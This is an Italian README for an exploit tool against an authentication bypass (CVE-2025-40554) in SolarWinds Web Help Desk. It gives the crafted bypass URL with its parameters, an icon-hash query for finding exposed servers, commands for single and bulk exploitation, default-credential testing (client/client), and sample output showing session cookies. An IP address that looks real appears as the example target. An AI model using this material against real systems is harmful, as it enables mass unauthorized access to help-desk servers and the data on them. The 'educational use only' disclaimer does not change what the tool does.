
Sfruttamento di CVE-2025-40554
Uno strumento completo di test di sicurezza per rilevare e sfruttare la vulnerabilità di bypass dell'autenticazione (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.
SOLO PER SCOPI EDUCATIVI E TEST DI SICUREZZA AUTORIZZATI
Questo strumento è fornito per ricerca sulla sicurezza, test di penetrazione e valutazione delle vulnerabilità su sistemi di tua proprietà o per i quali hai esplicito permesso scritto di testare. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non sono responsabili per l'uso improprio o i danni causati da questo strumento.
CVE-2025-40554 è una vulnerabilità critica di bypass dell'autenticazione in SolarWinds Web Help Desk che consente ad attaccanti non autenticati di:
Controlla da solo :))
Dipendenze:
# Clona o scarica lo script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# Rendi eseguibile
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# Controllo semplice della vulnerabilità
python3 CVE-2025-40554.py -t https://target:8443
# Con protocollo esplicito
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# Sfruttamento completo con enumerazione delle sessioni
python3 CVE-2025-40554.py -t https://target:8443 --exploit
# Salta il test delle credenziali predefinite
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login
# Scansiona più target da file
python3 CVE-2025-40554.py -l targets.txt
# Scansione in blocco con sfruttamento
python3 CVE-2025-40554.py -l targets.txt --exploit
# Modalità silenziosa (output minimo)
python3 CVE-2025-40554.py -l targets.txt -q
# File di output personalizzato
python3 CVE-2025-40554.py -l targets.txt -o results.txt
targets.txt:
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# I commenti sono supportati
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ Authentication Bypass Exploitation Tool ║
║ Research & Educational Purposes Only ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789
[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!
[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!
======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================
[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!
[*] Session Cookies:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled
[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!
[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed
...
======================================================================
SCAN SUMMARY
======================================================================
Total scanned: 5/5
Vulnerable: 2
With def. creds: 1
======================================================================
[+] Results saved to: vulnerable_targets.txt
Stabilimento della Sessione
Bypass dell'Autenticazione
Test delle Credenziali (opzionale)
Sfruttamento Completo (modalità --exploit)
Lo strumento rileva il bypass riuscito controllando:
externalAuthContainer - Configurazione auth esternaJSONRpcClient - Esposizione API clientSAML 2.0 - Configurazione SSOLoginPref - Impostazioni preferenze loginauthMode - Impostazioni modalità autenticazioneI contributi sono benvenuti.....
Questo strumento è fornito "così com'è" senza alcuna garanzia. Utilizzare a proprio rischio.
Skynoxk
Ricorda: Hackerizza sempre in modo etico e legale. L'accesso non autorizzato è un reato.
| Opzione | Descrizione |
|---|
-t, --target URL | URL del singolo target da testare |
-l, --list FILE | File contenente l'elenco dei target (uno per riga) |
--exploit | Abilita la modalità di sfruttamento completo con enumerazione |
--no-login | Salta il test delle credenziali predefinite |
-o, --output FILE | File di output per i target vulnerabili (default: vulnerable_targets.txt) |
-q, --quiet | Modalità di output minimo (utile per scansioni in blocco) |